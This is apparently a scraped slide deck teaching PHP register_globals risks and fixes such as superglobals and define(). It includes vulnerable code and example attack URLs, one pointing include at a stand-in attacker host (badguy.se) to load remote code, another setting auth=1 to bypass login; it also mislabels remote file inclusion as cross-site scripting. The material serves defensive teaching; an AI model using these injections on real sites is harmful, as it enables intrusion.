Download presentation
Presentation is loading. Please wait.
Published byEvangeline Wheeler Modified over 9 years ago
1
PHP Security: register_globals How To Make It Difficult For Hackers To Set Variables
2
What Is register_globals ? A directive in php.ini to automatically make variables out of environment, GET, POST, cookies, and server data (true/false) C.f. variables_order (EGPCS)
3
Examples (Part 1) With register_globals turned on, PHP will automatically create variables $mytext and $myhide and populate them with the values entered in the form (whether GET or POST).
4
Examples (Part 2) Similarly, with the URL… http://example.com/index.php?george=jungle …PHP will create $george for you and give it the value “jungle”. Cookie, server, and environment variables such as $DOCUMENT_ROOT and $PHP_SELF are also automatically created and populated. You don’t know where the values came from (EGPCS).
5
Problems (Part 1) <?php // …some code… include “$libdir/functions.inc”; // …more code… ?> If user sets $libdir in the URL, it can override your $libdir value, allowing cross-site scripting. E.g.: http://example.com/index.php?libdir=http://badguy.se/hack
6
Problems (Part 2) <?php if ($auth == 1) { // do stuff for authorized users } else { echo “Not authorized!”; } ?> If user sets $auth in the URL, it can override your $auth value, allowing unauthenticated use. E.g.: http://example.com/index.php?auth=1
7
Solutions (Part 1) Don’t let anyone see your code If they don’t know what variables to set, they can’t crack your script! Security-through-obscurity Does not work well, if at all Check all variables before using them Good practice anyway Sometimes hard to check (e.g., $auth)
8
Solutions (Part 2) Turn off register_globals ! Off by default in PHP 4.2.0 and later anyway Use the track_vars arrays instead: $_GET $_POST $_SERVER $_FILES $_ENV $_COOKIE Turned on by default in PHP 4.0.3 and later
9
Solution Examples (Part 1) With register_globals turned off, PHP will populate $_POST[‘mytext’] and $_POST[‘myhide’]. If the method was GET, the values are in $_GET[].
10
Solution Examples (Part 2) If a value is set in the URL… http://example.com/index.php?george=jungle … it becomes $_GET[‘george’] = “jungle” Post-method variables are in $_POST Get-method and URL variables are in $_GET Server variables are in $_SERVER Uploaded files are in $_FILES Cookie values in $_COOKIE Environment settings in $_ENV You know exactly where values are set from.
11
Use define For Path Names If you you have to set directory paths in variables, use constants instead define(‘LIBDIR’, ‘/path/to/lib’); Pathnames are especially dangerous in variables since they can lead directly to cross-site scripting security issues Once set, constants cannot be redefined, making them far more secure against accidental or unexpected value resets and hack attempts
12
References http://www.php.net/manual/en/security.registerglobals.php http://www.php.net/manual/en/security.registerglobals.php http://www.php.net/manual/en/security.php http://www.php.net/manual/en/security.php http://www.zend.com/zend/art/art-oertli.php http://www.zend.com/zend/art/art-oertli.php http://www.securereality.com.au/studyinscarlet.txt http://www.securereality.com.au/studyinscarlet.txt
Similar presentations
© 2025 SlidePlayer.com Inc.
All rights reserved.